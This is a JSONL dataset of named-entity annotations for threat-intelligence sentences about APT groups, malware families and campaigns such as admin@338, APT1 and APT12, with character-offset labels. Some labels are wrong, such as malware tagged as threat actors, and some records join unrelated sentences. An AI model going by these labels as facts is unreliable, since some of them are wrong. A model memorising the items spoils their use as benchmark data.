The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": {"THREAT_ACTOR: Gold Lowell": [[0, 11]], "FILEPATH: files": [[113, 118]], "VULNERABILITY: exploit": [[119, 126]], "TOOL: Microsoft Office": [[142, 158]], "VULNERABILITY: CVE-2012-0158": [[175, 188]]}, "info": {"id": "cyberner_stix_train_008017", "source": "cyberner_stix_train"}} {"text": "The attackers ’ final step was to exfiltrate data off the victim ’s network and onto Suckfly ’s infrastructure .", "spans": {"THREAT_ACTOR: Suckfly": [[85, 92]]}, "info": {"id": "cyberner_stix_train_008018", "source": "cyberner_stix_train"}} {"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "VULNERABILITY: EternalBlue exploit": [[46, 65]], "TOOL: open source tool": [[74, 90]], "TOOL: Responder": [[91, 100]], "MALWARE: Gazer": [[214, 219]], "MALWARE: backdoors": [[243, 252]], "THREAT_ACTOR: Turla": [[265, 270]], "THREAT_ACTOR: Carbon": [[285, 291]], "THREAT_ACTOR: Kazuar": [[296, 302]]}, "info": {"id": "cyberner_stix_train_008019", "source": "cyberner_stix_train"}} {"text": "These attacks against Albanian government institutions by the Sofacy Group were documented and reported by consultancy corporate PwC in December 2014 .", "spans": {"THREAT_ACTOR: Sofacy": [[62, 68]], "ORGANIZATION: PwC": [[129, 132]]}, "info": {"id": "cyberner_stix_train_008020", "source": "cyberner_stix_train"}} {"text": "About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim ’ s online banking account and perform money transfers . 
PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[168, 180]], "MALWARE: ThreeDollars": [[366, 378]], "FILEPATH: preparation.dot": [[438, 453]]}, "info": {"id": "cyberner_stix_train_008021", "source": "cyberner_stix_train"}} {"text": "The third type of information will be sent when RuMMS intercepts any SMS messages , including the balance inquiry results when it contacts the SMS code of a particular financial service . Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States . JhoneRAT : Cloud based python RAT targeting Middle Eastern countries . The Twitter handle used by Hack520 indicates also an “ est ” portion .", "spans": {"MALWARE: RuMMS": [[48, 53]], "THREAT_ACTOR: group": [[247, 252]], "ORGANIZATION: government organizations": [[354, 378]], "MALWARE: JhoneRAT": [[422, 430]], "TOOL: python": [[445, 451]], "TOOL: RAT": [[452, 455]], "ORGANIZATION: Hack520": [[520, 527]]}, "info": {"id": "cyberner_stix_train_008022", "source": "cyberner_stix_train"}} {"text": "Despite broad scrutiny and reports on MuddyWater attacks , the activity continues with only incremental changes to the tools and techniques .", "spans": {"THREAT_ACTOR: MuddyWater": [[38, 48]]}, "info": {"id": "cyberner_stix_train_008023", "source": "cyberner_stix_train"}} {"text": "In addition to the Mimikatz tool , the actor uploaded other tools to the webshell hosted at this second organization . 
es.exe : Mimikatz with custom loader , da53dcaeede03413ba02802c4be10883c4c28d3d28dee11734f048b90eb3d304 .", "spans": {"TOOL: Mimikatz": [[19, 27], [128, 136]], "FILEPATH: es.exe": [[119, 125]], "FILEPATH: da53dcaeede03413ba02802c4be10883c4c28d3d28dee11734f048b90eb3d304": [[158, 222]]}, "info": {"id": "cyberner_stix_train_008024", "source": "cyberner_stix_train"}} {"text": "Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": {"ORGANIZATION: iSIGHT Partners": [[18, 33]], "ORGANIZATION: customers": [[109, 118]], "ORGANIZATION: security firm": [[138, 151]], "ORGANIZATION: military officials": [[184, 202]], "TOOL: emails": [[222, 228]], "TOOL: Adobe Reader": [[274, 286]], "VULNERABILITY: vulnerability": [[287, 300]]}, "info": {"id": "cyberner_stix_train_008025", "source": "cyberner_stix_train"}} {"text": "In the 2016 Internet Crime Report published by the FBI , BEC was specifically highlighted as a \" Hot Topic \" , having been attributed to more than US$360 million in losses and gaining status as its own category of attack . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": {"ORGANIZATION: FBI": [[51, 54]], "ORGANIZATION: Uyghur ethnic group": [[290, 309]], "ORGANIZATION: Muslim minority group": [[314, 335]]}, "info": {"id": "cyberner_stix_train_008026", "source": "cyberner_stix_train"}} {"text": "My initial thought was the worst-case scenario – they ’ve been compromised and are distributing malware ! 
I immediately downloaded the file from the website , but everything looked normal .", "spans": {}, "info": {"id": "cyberner_stix_train_008027", "source": "cyberner_stix_train"}} {"text": "Working with U.S. Government partners , DHS and FBI identified Internet Protocol ( IP ) addresses associated with a malware variant , known as DeltaCharlie , used to manage North Korea 's distributed denial-of-service ( DDoS ) botnet infrastructure .", "spans": {"ORGANIZATION: Government": [[18, 28]], "ORGANIZATION: DHS": [[40, 43]], "ORGANIZATION: FBI": [[48, 51]], "MALWARE: DeltaCharlie": [[143, 155]], "TOOL: botnet infrastructure": [[227, 248]]}, "info": {"id": "cyberner_stix_train_008028", "source": "cyberner_stix_train"}} {"text": "Following is the HTTP response from the C2 server , containing the encrypted configuration : EventBot Encrypted HTTP response returned from the C2 Encrypted HTTP response returned from the C2 . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region .", "spans": {"MALWARE: EventBot": [[93, 101]], "MALWARE: Bemstour": [[228, 236]], "MALWARE: MPK bot": [[304, 311]], "THREAT_ACTOR: Rocket Kitten": [[404, 417]]}, "info": {"id": "cyberner_stix_train_008029", "source": "cyberner_stix_train"}} {"text": "Investigators indicated that the actors may have gained access to DCCC systems as early as March .", "spans": {"ORGANIZATION: DCCC": [[66, 70]]}, "info": {"id": "cyberner_stix_train_008030", "source": "cyberner_stix_train"}} {"text": "The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . 
The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party .", "spans": {"MALWARE: cmd.exe": [[80, 87]], "ORGANIZATION: employees": [[237, 246]], "ORGANIZATION: government agencies": [[270, 289]], "ORGANIZATION: security services": [[292, 309]], "ORGANIZATION: students": [[324, 332]], "ORGANIZATION: Fatah political party": [[365, 386]]}, "info": {"id": "cyberner_stix_train_008031", "source": "cyberner_stix_train"}} {"text": "Although BokBot has aided the distribution of TrickBot since 2017 , the development of custom TrickBot modules for the specific campaign has not been observed before . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"TOOL: BokBot": [[9, 15]], "TOOL: TrickBot": [[46, 54]], "TOOL: TrickBot modules": [[94, 110]], "THREAT_ACTOR: BRONZE BUTLER": [[168, 181]], "VULNERABILITY: zero-day": [[237, 245]]}, "info": {"id": "cyberner_stix_train_008032", "source": "cyberner_stix_train"}} {"text": "The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "TOOL: publicly available RATs": [[117, 140]], "TOOL: Poison Ivy": [[149, 159]], "TOOL: non-public backdoors": [[175, 195]]}, "info": {"id": "dnrti_train_000000", "source": "dnrti_train"}} {"text": "The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: media companies": [[42, 57]]}, "info": {"id": "dnrti_train_000001", "source": 
"dnrti_train"}} {"text": "Multiple China-based cyber threat groups have targeted international media organizations in the past .", "spans": {"THREAT_ACTOR: cyber threat groups": [[21, 40]], "ORGANIZATION: international media organizations": [[55, 88]]}, "info": {"id": "dnrti_train_000002", "source": "dnrti_train"}} {"text": "The admin@338 has targeted international media organizations in the past .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: international media organizations": [[27, 60]]}, "info": {"id": "dnrti_train_000003", "source": "dnrti_train"}} {"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": {"THREAT_ACTOR: admin@338": [[21, 30]], "ORGANIZATION: media organizations": [[89, 108]]}, "info": {"id": "dnrti_train_000004", "source": "dnrti_train"}} {"text": "In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": {"THREAT_ACTOR: threat actors": [[21, 34]], "ORGANIZATION: media organizations": [[93, 112]]}, "info": {"id": "dnrti_train_000005", "source": "dnrti_train"}} {"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations .", "spans": {"THREAT_ACTOR: admin@338": [[21, 30]], "ORGANIZATION: media organizations": [[89, 108]]}, "info": {"id": "dnrti_train_000006", "source": "dnrti_train"}} {"text": "The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: policy organizations": [[56, 76]], "ORGANIZATION: audiences": [[165, 174]]}, "info": {"id": "dnrti_train_000007", "source": "dnrti_train"}} {"text": "Once the LOWBALL malware calls back to the Dropbox 
account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": {"TOOL: LOWBALL malware": [[9, 24]], "THREAT_ACTOR: admin@338": [[65, 74]], "MALWARE: upload.bat": [[101, 111]]}, "info": {"id": "dnrti_train_000008", "source": "dnrti_train"}} {"text": "We observed the admin@338 upload a second stage malware , known as BUBBLEWRAP ( also known as Backdoor.APT.FakeWinHTTPHelper ) to their Dropbox account along with the following command .", "spans": {"THREAT_ACTOR: admin@338": [[16, 25]], "TOOL: BUBBLEWRAP": [[67, 77]], "TOOL: Backdoor.APT.FakeWinHTTPHelper": [[94, 124]]}, "info": {"id": "dnrti_train_000009", "source": "dnrti_train"}} {"text": "We have previously observed the admin@338 group use BUBBLEWRAP .", "spans": {"THREAT_ACTOR: admin@338 group": [[32, 47]], "TOOL: BUBBLEWRAP": [[52, 62]]}, "info": {"id": "dnrti_train_000010", "source": "dnrti_train"}} {"text": "The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets .", "spans": {"TOOL: LOWBALL": [[4, 11]], "THREAT_ACTOR: group": [[43, 48]], "TOOL: BUBBLEWRAP": [[106, 116]]}, "info": {"id": "dnrti_train_000011", "source": "dnrti_train"}} {"text": "The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]]}, "info": {"id": "dnrti_train_000012", "source": "dnrti_train"}} {"text": "An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": {"THREAT_ACTOR: APT": [[3, 6]], "THREAT_ACTOR: gang": [[7, 11]]}, "info": {"id": "dnrti_train_000013", "source": 
"dnrti_train"}} {"text": "The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: admin@338": [[54, 63]], "TOOL: remote access Trojans": [[121, 142]], "TOOL: Poison Ivy": [[151, 161]], "ORGANIZATION: financial firms": [[187, 202]]}, "info": {"id": "dnrti_train_000014", "source": "dnrti_train"}} {"text": "The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": {"THREAT_ACTOR: agroup": [[4, 10]], "THREAT_ACTOR: admin@338": [[55, 64]], "TOOL: remote access Trojans": [[122, 143]], "TOOL: Poison Ivy": [[152, 162]], "ORGANIZATION: financial firms": [[188, 203]]}, "info": {"id": "dnrti_train_000015", "source": "dnrti_train"}} {"text": "The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: defense sectors": [[130, 145]]}, "info": {"id": "dnrti_train_000016", "source": "dnrti_train"}} {"text": "The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": {"THREAT_ACTOR: APT actor": [[4, 13]], "ORGANIZATION: defense sectors": [[130, 145]]}, "info": {"id": "dnrti_train_000017", "source": "dnrti_train"}} {"text": "In August 2013 , FireEye reported that admin@338 had been using the Poison Ivy RAT in its operations .", "spans": {"ORGANIZATION: FireEye": [[17, 24]], "THREAT_ACTOR: admin@338": [[39, 48]], "TOOL: Poison Ivy RAT": [[68, 82]]}, "info": {"id": "dnrti_train_000018", "source": 
"dnrti_train"}} {"text": "In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": {"THREAT_ACTOR: admin@338": [[20, 29]], "ORGANIZATION: think tank": [[157, 167]]}, "info": {"id": "dnrti_train_000019", "source": "dnrti_train"}} {"text": "In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": {"THREAT_ACTOR: group": [[20, 25]], "ORGANIZATION: think tank": [[153, 163]]}, "info": {"id": "dnrti_train_000020", "source": "dnrti_train"}} {"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: admin@338": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]]}, "info": {"id": "dnrti_train_000021", "source": "dnrti_train"}} {"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: attackers": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]]}, "info": {"id": "dnrti_train_000022", "source": "dnrti_train"}} {"text": "The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "TOOL: BUBBLEWRAP": [[94, 104]]}, "info": {"id": "dnrti_train_000023", "source": "dnrti_train"}} {"text": "Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , 
particularly ones whose reporting focuses on the pro-democracy movement .", "spans": {"THREAT_ACTOR: threat groups": [[69, 82]], "ORGANIZATION: media organizations": [[103, 122]]}, "info": {"id": "dnrti_train_000024", "source": "dnrti_train"}} {"text": "Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": {"THREAT_ACTOR: admin@338": [[57, 66]], "ORGANIZATION: media organizations": [[87, 106]]}, "info": {"id": "dnrti_train_000025", "source": "dnrti_train"}} {"text": "This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": {"ORGANIZATION: FireEye": [[25, 32]], "THREAT_ACTOR: group": [[51, 56]], "THREAT_ACTOR: hackers": [[74, 81]], "THREAT_ACTOR: admin@338": [[89, 98]], "THREAT_ACTOR: attackers": [[158, 167]], "ORGANIZATION: government officials": [[177, 197]], "THREAT_ACTOR: cyber espionage": [[233, 248]]}, "info": {"id": "dnrti_train_000026", "source": "dnrti_train"}} {"text": "The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "TOOL: Poison Ivy RAT": [[31, 45]], "TOOL: WinHTTPHelper malware": [[50, 71]], "ORGANIZATION: government officials": [[103, 123]]}, "info": {"id": "dnrti_train_000027", "source": "dnrti_train"}} {"text": "The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "TOOL: Poison Ivy RAT": [[31, 45]], "TOOL: WinHTTPHelper malware": [[50, 71]], "ORGANIZATION: government officials": [[103, 123]]}, "info": {"id": "dnrti_train_000028", "source": "dnrti_train"}} 
{"text": "FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: admin@338 group": [[32, 47]], "TOOL: Poison Ivy": [[89, 99]]}, "info": {"id": "dnrti_train_000029", "source": "dnrti_train"}} {"text": "The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March .", "spans": {"THREAT_ACTOR: admin@338": [[72, 81]], "ORGANIZATION: think tank": [[131, 141]]}, "info": {"id": "dnrti_train_000030", "source": "dnrti_train"}} {"text": "Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors .", "spans": {"THREAT_ACTOR: APT1": [[41, 45]], "THREAT_ACTOR: cyber threat actors": [[120, 139]]}, "info": {"id": "dnrti_train_000031", "source": "dnrti_train"}} {"text": "FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: admin@338": [[28, 37]], "THREAT_ACTOR: group": [[69, 74]]}, "info": {"id": "dnrti_train_000032", "source": "dnrti_train"}} {"text": "The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai .", "spans": {"THREAT_ACTOR: APT1": [[53, 57]]}, "info": {"id": "dnrti_train_000033", "source": "dnrti_train"}} {"text": "These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are .", "spans": {"THREAT_ACTOR: APT1": [[26, 30], [105, 109]]}, "info": {"id": "dnrti_train_000034", "source": "dnrti_train"}} {"text": "APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it 
presently .", "spans": {"THREAT_ACTOR: APT1": [[0, 4]], "TOOL: BISCUIT": [[36, 43]]}, "info": {"id": "dnrti_train_000035", "source": "dnrti_train"}} {"text": "While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT .", "spans": {"THREAT_ACTOR: APT1": [[6, 10]], "TOOL: publicly available backdoors": [[38, 66]], "TOOL: Poison Ivy": [[75, 85]], "TOOL: Gh0st RAT": [[90, 99]]}, "info": {"id": "dnrti_train_000036", "source": "dnrti_train"}} {"text": "Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 .", "spans": {"THREAT_ACTOR: PLA Unit 61398": [[49, 63], [83, 97]], "THREAT_ACTOR: APT1": [[101, 105]]}, "info": {"id": "dnrti_train_000037", "source": "dnrti_train"}} {"text": "APT1 were a highly prolific cyber-attack group operating out of China .", "spans": {"THREAT_ACTOR: APT1": [[0, 4]], "THREAT_ACTOR: cyber-attack group": [[28, 46]]}, "info": {"id": "dnrti_train_000038", "source": "dnrti_train"}} {"text": "APT1 is a China-based cyber-espionage group , active since mid-2006 .", "spans": {"THREAT_ACTOR: APT1": [[0, 4]], "THREAT_ACTOR: cyber-espionage group": [[22, 43]]}, "info": {"id": "dnrti_train_000039", "source": "dnrti_train"}} {"text": "APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals .", "spans": {"THREAT_ACTOR: APT12": [[0, 5]]}, "info": {"id": "dnrti_train_000040", "source": "dnrti_train"}} {"text": "Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE .", "spans": {"ORGANIZATION: Arbor": [[25, 30]], "ORGANIZATION: FireEye": [[43, 50]], "THREAT_ACTOR: APT12": [[64, 69]], "TOOL: HIGHTIDE": [[107, 115]]}, "info": {"id": "dnrti_train_000041", "source": "dnrti_train"}} {"text": "However , the malware shared several traits with the RIPTIDE and HIGHTIDE backdoor that we have attributed to APT12 .", "spans": {"TOOL: RIPTIDE": [[53, 60]], "TOOL: HIGHTIDE backdoor": [[65, 
82]], "THREAT_ACTOR: APT12": [[110, 115]]}, "info": {"id": "dnrti_train_000042", "source": "dnrti_train"}} {"text": "From October 2012 to May 2014 , FireEye observed APT12 utilizing RIPTIDE , that communicates via HTTP to a hard-coded command and control ( C2 ) server .", "spans": {"ORGANIZATION: FireEye": [[32, 39]], "THREAT_ACTOR: APT12": [[49, 54]], "TOOL: RIPTIDE": [[65, 72]], "TOOL: HTTP": [[97, 101]]}, "info": {"id": "dnrti_train_000043", "source": "dnrti_train"}} {"text": "Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": {"THREAT_ACTOR: APT12": [[31, 36]], "TOOL: HIGHTIDE": [[65, 73]], "TOOL: Microsoft Word": [[82, 96]], "TOOL: .doc": [[99, 103]], "VULNERABILITY: CVE-2012-0158": [[129, 142]]}, "info": {"id": "dnrti_train_000044", "source": "dnrti_train"}} {"text": "FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: RIPTIDE": [[33, 40]], "TOOL: HIGHTIDE": [[44, 52]], "THREAT_ACTOR: APT12": [[123, 128]]}, "info": {"id": "dnrti_train_000045", "source": "dnrti_train"}} {"text": "They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": {"TOOL: publicly available RATs": [[109, 132]], "TOOL: Poison Ivy": [[141, 151]], "TOOL: non-public backdoors": [[167, 187]]}, "info": {"id": "dnrti_train_000046", "source": "dnrti_train"}} {"text": "A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity .", "spans": {"THREAT_ACTOR: cyber threat group": [[14, 32]], "ORGANIZATION: FireEye": [[41, 48]], "THREAT_ACTOR: threat": 
[[96, 102]], "THREAT_ACTOR: admin@338": [[151, 160]]}, "info": {"id": "dnrti_train_000047", "source": "dnrti_train"}} {"text": "The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: policy organizations": [[52, 72]], "ORGANIZATION: audiences": [[161, 170]]}, "info": {"id": "dnrti_train_000048", "source": "dnrti_train"}} {"text": "About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families .", "spans": {"ORGANIZATION: The New York Times": [[24, 42]], "THREAT_ACTOR: APT12": [[85, 90]], "TOOL: Backdoor.APT.Aumlib": [[147, 166]], "TOOL: Backdoor.APT.Ixeshe malware families": [[171, 207]]}, "info": {"id": "dnrti_train_000049", "source": "dnrti_train"}} {"text": "With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": {"THREAT_ACTOR: NUMBERED PANDA": [[109, 123]], "THREAT_ACTOR: Numbered Panda": [[126, 140]], "THREAT_ACTOR: DYNCALC": [[227, 234]], "THREAT_ACTOR: IXESHE": [[237, 243]], "THREAT_ACTOR: JOY RAT": [[246, 253]], "THREAT_ACTOR: APT-12": [[256, 262]]}, "info": {"id": "dnrti_train_000050", "source": "dnrti_train"}} {"text": "Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": {"THREAT_ACTOR: Numbered Panda": [[0, 14]], "THREAT_ACTOR: DYNCALC": [[101, 108]], "THREAT_ACTOR: IXESHE": [[111, 117]], "THREAT_ACTOR: JOY RAT": [[120, 127]], "THREAT_ACTOR: APT-12": [[130, 136]]}, "info": {"id": "dnrti_train_000051", "source": 
"dnrti_train"}} {"text": "The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China .", "spans": {"THREAT_ACTOR: APT12": [[64, 69]], "THREAT_ACTOR: group": [[142, 147]]}, "info": {"id": "dnrti_train_000052", "source": "dnrti_train"}} {"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries .", "spans": {"THREAT_ACTOR: APT16": [[85, 90]]}, "info": {"id": "dnrti_train_000053", "source": "dnrti_train"}} {"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries .", "spans": {"THREAT_ACTOR: APT groups": [[85, 95]]}, "info": {"id": "dnrti_train_000054", "source": "dnrti_train"}} {"text": "On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": {"THREAT_ACTOR: APT16": [[48, 53]], "ORGANIZATION: financial": [[133, 142]], "ORGANIZATION: high-tech companies": [[147, 166]]}, "info": {"id": "dnrti_train_000055", "source": "dnrti_train"}} {"text": "On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": {"THREAT_ACTOR: APT group": [[48, 57]], "ORGANIZATION: financial": [[137, 146]], "ORGANIZATION: high-tech companies": [[151, 170]]}, "info": {"id": "dnrti_train_000056", "source": "dnrti_train"}} {"text": "While attribution of 
the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 .", "spans": {"THREAT_ACTOR: APT group": [[149, 158]], "THREAT_ACTOR: APT16": [[179, 184]]}, "info": {"id": "dnrti_train_000057", "source": "dnrti_train"}} {"text": "APT16 actors sent spear phishing emails to two Taiwanese media organizations .", "spans": {"THREAT_ACTOR: APT16 actors": [[0, 12]], "ORGANIZATION: media organizations": [[57, 76]]}, "info": {"id": "dnrti_train_000058", "source": "dnrti_train"}} {"text": "On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website .", "spans": {"THREAT_ACTOR: APT16": [[22, 27]], "THREAT_ACTOR: APT actors": [[73, 83]], "ORGANIZATION: government agency": [[110, 127]]}, "info": {"id": "dnrti_train_000059", "source": "dnrti_train"}} {"text": "It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor .", "spans": {"THREAT_ACTOR: APT16": [[47, 52]], "ORGANIZATION: government agency": [[93, 110]], "TOOL: ELMER backdoor": [[193, 207]]}, "info": {"id": "dnrti_train_000060", "source": "dnrti_train"}} {"text": "Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 .", "spans": {"ORGANIZATION: media organizations": [[78, 97]], "THREAT_ACTOR: APT16": [[141, 146]]}, "info": {"id": "dnrti_train_000061", "source": "dnrti_train"}} {"text": "The suspected APT16 targeting of the Taiwanese government agency – in addition to the Taiwanese media organizations – further supports this possibility .", "spans": {"THREAT_ACTOR: APT16": [[14, 
19]], "ORGANIZATION: government agency": [[47, 64]], "ORGANIZATION: media organizations": [[96, 115]]}, "info": {"id": "dnrti_train_000062", "source": "dnrti_train"}} {"text": "APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" .", "spans": {"THREAT_ACTOR: APT17": [[0, 5]], "TOOL: BLACKCOFFEE malware": [[55, 74]], "ORGANIZATION: information security community": [[163, 193]]}, "info": {"id": "dnrti_train_000063", "source": "dnrti_train"}} {"text": "APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"THREAT_ACTOR: APT17": [[0, 5]], "THREAT_ACTOR: DeputyDog": [[22, 31]], "THREAT_ACTOR: threat group": [[51, 63]], "ORGANIZATION: FireEye Intelligence": [[69, 89]], "ORGANIZATION: government entities": [[146, 165]], "ORGANIZATION: law firms": [[191, 200]], "ORGANIZATION: information technology companies": [[203, 235]], "ORGANIZATION: mining companies": [[238, 254]], "ORGANIZATION: non-government organizations": [[261, 289]]}, "info": {"id": "dnrti_train_000064", "source": "dnrti_train"}} {"text": "FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT17": [[22, 27]], "TOOL: BLACKCOFFEE": [[38, 49]]}, "info": {"id": "dnrti_train_000065", "source": "dnrti_train"}} {"text": "The use of BLACKCOFFEE demonstrates APT17 's evolving 